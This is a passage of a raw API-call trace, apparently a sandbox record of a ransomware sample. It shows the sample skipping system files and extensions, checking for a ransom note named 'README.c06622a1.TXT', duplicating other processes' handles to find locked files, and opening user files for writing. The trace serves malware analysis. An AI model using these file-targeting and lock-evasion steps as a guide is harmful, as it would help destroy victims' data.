lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.471] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.472] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.473] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.473] CloseHandle (hObject=0x1e4) returned 1 [0165.473] _wcsicmp (_Str1="\\My", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.473] CloseHandle (hObject=0x194) returned 1 [0165.473] CloseHandle (hObject=0x1e8) returned 1 [0165.473] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0165.473] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.473] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.474] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.475] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.475] CloseHandle (hObject=0x1e4) returned 1 [0165.475] _wcsicmp (_Str1="\\mpengine.dll", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.475] CloseHandle (hObject=0x194) returned 1 [0165.475] CloseHandle (hObject=0x1e8) returned 1 [0165.475] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0165.475] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.475] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.476] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.477] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.477] CloseHandle (hObject=0x1e4) returned 1 [0165.477] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0165.477] CloseHandle (hObject=0x194) returned 1 [0165.477] CloseHandle (hObject=0x1e8) returned 1 [0165.477] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0165.477] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.477] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.478] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.479] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.479] CloseHandle (hObject=0x1e4) returned 1 [0165.479] CloseHandle (hObject=0x194) returned 1 [0165.479] CloseHandle (hObject=0x1e8) returned 1 [0165.479] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0165.479] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.479] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.480] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.481] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.481] CloseHandle (hObject=0x1e4) returned 1 [0165.481] _wcsicmp (_Str1="\\radarrs.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 4 [0165.481] CloseHandle (hObject=0x194) returned 1 [0165.481] CloseHandle (hObject=0x1e8) returned 1 [0165.481] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0165.481] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x120, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.481] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.482] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.483] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.483] CloseHandle (hObject=0x1e4) returned 1 [0165.483] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0165.483] CloseHandle (hObject=0x194) returned 1 [0165.483] CloseHandle (hObject=0x1e8) returned 1 [0165.483] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0165.483] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.483] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.484] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.485] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.485] CloseHandle (hObject=0x1e4) returned 1 [0165.485] CloseHandle (hObject=0x194) returned 1 [0165.485] CloseHandle (hObject=0x1e8) returned 1 [0165.485] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x86c) returned 0x1e8 [0165.485] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.486] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.486] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.487] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.487] CloseHandle (hObject=0x1e4) returned 1 [0165.487] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0165.487] CloseHandle (hObject=0x194) returned 1 [0165.487] CloseHandle (hObject=0x1e8) returned 1 [0165.487] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x86c) returned 0x1e8 [0165.488] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.488] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.489] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.489] CloseHandle (hObject=0x1e4) returned 1 [0165.489] CloseHandle (hObject=0x194) returned 1 [0165.490] CloseHandle (hObject=0x1e8) returned 1 [0165.490] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x210e20) returned 1 [0165.490] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0165.490] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0165.491] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0165.492] _wcsicmp (_Str1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", _Str2="README.c06622a1.TXT") returned -4 [0165.492] wcsstr (_Str="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", _SubStr="README") returned 0x0 [0165.492] _wcsicmp (_Str1="autorun.inf", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0165.492] wcslen (_String="autorun.inf") returned 0xb [0165.492] _wcsicmp (_Str1="boot.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -12 [0165.492] wcslen (_String="boot.ini") returned 0x8 [0165.492] _wcsicmp (_Str1="bootfont.bin", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -12 [0165.492] wcslen (_String="bootfont.bin") returned 0xc [0165.492] _wcsicmp (_Str1="bootsect.bak", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -12 [0165.492] wcslen (_String="bootsect.bak") returned 0xc [0165.492] _wcsicmp (_Str1="desktop.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0165.492] wcslen (_String="desktop.ini") returned 0xb [0165.492] _wcsicmp (_Str1="iconcache.db", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0165.492] wcslen (_String="iconcache.db") returned 0xc [0165.492] _wcsicmp (_Str1="ntldr", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0165.492] wcslen (_String="ntldr") returned 0x5 [0165.492] _wcsicmp (_Str1="ntuser.dat", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -123 [0165.492] wcslen (_String="ntuser.dat") returned 0xa [0165.492] _wcsicmp (_Str1="ntuser.dat.log", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -77 [0165.492] wcslen (_String="ntuser.dat.log") returned 0xe [0165.492] _wcsicmp (_Str1="ntuser.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.492] wcslen (_String="ntuser.ini") returned 0xa [0165.492] _wcsicmp (_Str1="thumbs.db", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0165.492] wcslen (_String="thumbs.db") returned 0x9 [0165.492] _wcsicmp (_Str1="386", _Str2="regtrans-ms") returned -63 [0165.492] wcslen (_String="386") returned 0x3 [0165.492] _wcsicmp (_Str1="adv", _Str2="regtrans-ms") returned -17 [0165.492] wcslen (_String="adv") returned 0x3 [0165.492] _wcsicmp (_Str1="ani", _Str2="regtrans-ms") returned -17 [0165.492] wcslen (_String="ani") returned 0x3 [0165.492] _wcsicmp (_Str1="bat", _Str2="regtrans-ms") returned -16 [0165.493] wcslen (_String="bat") returned 0x3 [0165.493] _wcsicmp (_Str1="bin", _Str2="regtrans-ms") returned -16 [0165.493] wcslen (_String="bin") returned 0x3 [0165.493] _wcsicmp (_Str1="cab", _Str2="regtrans-ms") returned -15 [0165.493] wcslen (_String="cab") returned 0x3 [0165.493] _wcsicmp (_Str1="cmd", _Str2="regtrans-ms") returned -15 [0165.493] wcslen (_String="cmd") returned 0x3 [0165.493] _wcsicmp (_Str1="com", _Str2="regtrans-ms") returned -15 [0165.493] wcslen (_String="com") returned 0x3 [0165.493] _wcsicmp (_Str1="cpl", _Str2="regtrans-ms") returned -15 [0165.493] wcslen (_String="cpl") returned 0x3 [0165.493] _wcsicmp (_Str1="cur", _Str2="regtrans-ms") returned -15 [0165.493] wcslen (_String="cur") returned 0x3 [0165.493] _wcsicmp (_Str1="deskthemepack", _Str2="regtrans-ms") returned -14 [0165.493] wcslen (_String="deskthemepack") returned 0xd [0165.493] _wcsicmp (_Str1="diagcab", _Str2="regtrans-ms") returned -14 [0165.493] wcslen (_String="diagcab") returned 0x7 [0165.493] _wcsicmp (_Str1="diagcfg", _Str2="regtrans-ms") returned -14 [0165.493] wcslen (_String="diagcfg") returned 0x7 [0165.493] _wcsicmp (_Str1="diagpkg", _Str2="regtrans-ms") returned -14 [0165.493] wcslen (_String="diagpkg") returned 0x7 [0165.493] _wcsicmp (_Str1="dll", _Str2="regtrans-ms") returned -14 [0165.493] wcslen (_String="dll") returned 0x3 [0165.493] _wcsicmp (_Str1="drv", _Str2="regtrans-ms") returned -14 [0165.493] wcslen (_String="drv") returned 0x3 [0165.493] _wcsicmp (_Str1="exe", _Str2="regtrans-ms") returned -13 [0165.493] wcslen (_String="exe") returned 0x3 [0165.493] _wcsicmp (_Str1="hlp", _Str2="regtrans-ms") returned -10 [0165.493] wcslen (_String="hlp") returned 0x3 [0165.493] _wcsicmp (_Str1="icl", _Str2="regtrans-ms") returned -9 [0165.493] wcslen (_String="icl") returned 0x3 [0165.493] _wcsicmp (_Str1="icns", _Str2="regtrans-ms") returned -9 [0165.494] wcslen (_String="icns") returned 0x4 [0165.494] _wcsicmp (_Str1="ico", _Str2="regtrans-ms") returned -9 [0165.494] wcslen (_String="ico") returned 0x3 [0165.494] _wcsicmp (_Str1="ics", _Str2="regtrans-ms") returned -9 [0165.494] wcslen (_String="ics") returned 0x3 [0165.494] _wcsicmp (_Str1="idx", _Str2="regtrans-ms") returned -9 [0165.494] wcslen (_String="idx") returned 0x3 [0165.494] _wcsicmp (_Str1="ldf", _Str2="regtrans-ms") returned -6 [0165.494] wcslen (_String="ldf") returned 0x3 [0165.494] _wcsicmp (_Str1="lnk", _Str2="regtrans-ms") returned -6 [0165.494] wcslen (_String="lnk") returned 0x3 [0165.494] _wcsicmp (_Str1="mod", _Str2="regtrans-ms") returned -5 [0165.494] wcslen (_String="mod") returned 0x3 [0165.494] _wcsicmp (_Str1="mpa", _Str2="regtrans-ms") returned -5 [0165.494] wcslen (_String="mpa") returned 0x3 [0165.494] _wcsicmp (_Str1="msc", _Str2="regtrans-ms") returned -5 [0165.494] wcslen (_String="msc") returned 0x3 [0165.494] _wcsicmp (_Str1="msp", _Str2="regtrans-ms") returned -5 [0165.494] wcslen (_String="msp") returned 0x3 [0165.494] _wcsicmp (_Str1="msstyles", _Str2="regtrans-ms") returned -5 [0165.494] wcslen (_String="msstyles") returned 0x8 [0165.494] _wcsicmp (_Str1="msu", _Str2="regtrans-ms") returned -5 [0165.494] wcslen (_String="msu") returned 0x3 [0165.494] _wcsicmp (_Str1="nls", _Str2="regtrans-ms") returned -4 [0165.494] wcslen (_String="nls") returned 0x3 [0165.494] _wcsicmp (_Str1="nomedia", _Str2="regtrans-ms") returned -4 [0165.494] wcslen (_String="nomedia") returned 0x7 [0165.494] _wcsicmp (_Str1="ocx", _Str2="regtrans-ms") returned -3 [0165.494] wcslen (_String="ocx") returned 0x3 [0165.494] _wcsicmp (_Str1="prf", _Str2="regtrans-ms") returned -2 [0165.494] wcslen (_String="prf") returned 0x3 [0165.494] _wcsicmp (_Str1="ps1", _Str2="regtrans-ms") returned -2 [0165.494] wcslen (_String="ps1") returned 0x3 [0165.494] _wcsicmp (_Str1="rom", _Str2="regtrans-ms") returned 10 [0165.494] wcslen (_String="rom") returned 0x3 [0165.495] _wcsicmp (_Str1="rtp", _Str2="regtrans-ms") returned 15 [0165.495] wcslen (_String="rtp") returned 0x3 [0165.495] _wcsicmp (_Str1="scr", _Str2="regtrans-ms") returned 1 [0165.495] wcslen (_String="scr") returned 0x3 [0165.495] _wcsicmp (_Str1="shs", _Str2="regtrans-ms") returned 1 [0165.495] wcslen (_String="shs") returned 0x3 [0165.495] _wcsicmp (_Str1="spl", _Str2="regtrans-ms") returned 1 [0165.495] wcslen (_String="spl") returned 0x3 [0165.495] _wcsicmp (_Str1="sys", _Str2="regtrans-ms") returned 1 [0165.495] wcslen (_String="sys") returned 0x3 [0165.495] _wcsicmp (_Str1="theme", _Str2="regtrans-ms") returned 2 [0165.495] wcslen (_String="theme") returned 0x5 [0165.495] _wcsicmp (_Str1="themepack", _Str2="regtrans-ms") returned 2 [0165.495] wcslen (_String="themepack") returned 0x9 [0165.495] _wcsicmp (_Str1="wpx", _Str2="regtrans-ms") returned 5 [0165.495] wcslen (_String="wpx") returned 0x3 [0165.495] _wcsicmp (_Str1="lock", _Str2="regtrans-ms") returned -6 [0165.495] wcslen (_String="lock") returned 0x4 [0165.495] _wcsicmp (_Str1="key", _Str2="regtrans-ms") returned -7 [0165.495] wcslen (_String="key") returned 0x3 [0165.495] _wcsicmp (_Str1="hta", _Str2="regtrans-ms") returned -10 [0165.495] wcslen (_String="hta") returned 0x3 [0165.495] _wcsicmp (_Str1="msi", _Str2="regtrans-ms") returned -5 [0165.495] wcslen (_String="msi") returned 0x3 [0165.495] _wcsicmp (_Str1="pdb", _Str2="regtrans-ms") returned -2 [0165.495] wcslen (_String="pdb") returned 0x3 [0165.495] _wcsicmp (_Str1="sqlite", _Str2="regtrans-ms") returned 1 [0165.495] wcslen (_String="sqlite") returned 0x6 [0165.495] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0165.495] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1f8e18 [0165.496] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" [0165.496] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x21 [0165.496] wcscpy (in: _Dest=0x1f8e5c, _Source="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: _Dest="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0165.496] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x80) returned 1 [0165.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.496] GetCurrentProcessId () returned 0xb58 [0165.496] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0165.497] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x400) returned 0x208e38 [0165.497] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x208e38, Length=0x400, ResultLength=0x32ee30 | out: SystemInformation=0x208e38, ResultLength=0x32ee30*=0x27b14) returned 0xc0000004 [0165.497] RtlReAllocateHeap (Heap=0x130000, Flags=0x0, Ptr=0x208e38, Size=0x27b14) returned 0x3210048 [0165.498] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x3210048, Length=0x27b14, ResultLength=0x32ee30 | out: SystemInformation=0x3210048, ResultLength=0x32ee30*=0x27b14) returned 0x0 [0165.502] GetCurrentProcessId () returned 0xb58 [0165.503] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0165.503] CloseHandle (hObject=0x1e8) returned 1 [0165.503] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x400) returned 0x208e38 [0165.503] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x208e38, Length=0x400, ResultLength=0x32ee70 | out: SystemInformation=0x208e38, ResultLength=0x32ee70*=0x27b04) returned 0xc0000004 [0165.503] RtlReAllocateHeap (Heap=0x130000, Flags=0x0, Ptr=0x208e38, Size=0x27b04) returned 0x3210048 [0165.503] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x3210048, Length=0x27b04, ResultLength=0x32ee70 | out: SystemInformation=0x3210048, ResultLength=0x32ee70*=0x27b04) returned 0x0 [0165.506] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x10000) returned 0x210e20 [0165.507] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0165.507] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.507] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.508] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.512] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.513] CloseHandle (hObject=0x1e4) returned 1 [0165.513] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0165.513] CloseHandle (hObject=0x194) returned 1 [0165.513] CloseHandle (hObject=0x1e8) returned 1 [0165.513] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0165.513] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.513] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.514] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.514] CloseHandle (hObject=0x1e4) returned 1 [0165.514] CloseHandle (hObject=0x194) returned 1 [0165.515] CloseHandle (hObject=0x1e8) returned 1 [0165.515] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0165.515] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.515] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.515] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.516] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.516] CloseHandle (hObject=0x1e4) returned 1 [0165.516] CloseHandle (hObject=0x194) returned 1 [0165.516] CloseHandle (hObject=0x1e8) returned 1 [0165.516] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0165.516] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.516] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.517] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.518] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.518] CloseHandle (hObject=0x1e4) returned 1 [0165.518] CloseHandle (hObject=0x194) returned 1 [0165.518] CloseHandle (hObject=0x1e8) returned 1 [0165.518] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0165.518] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x18, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.518] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.519] WaitForSingleObject (hHandle=0x1e4, 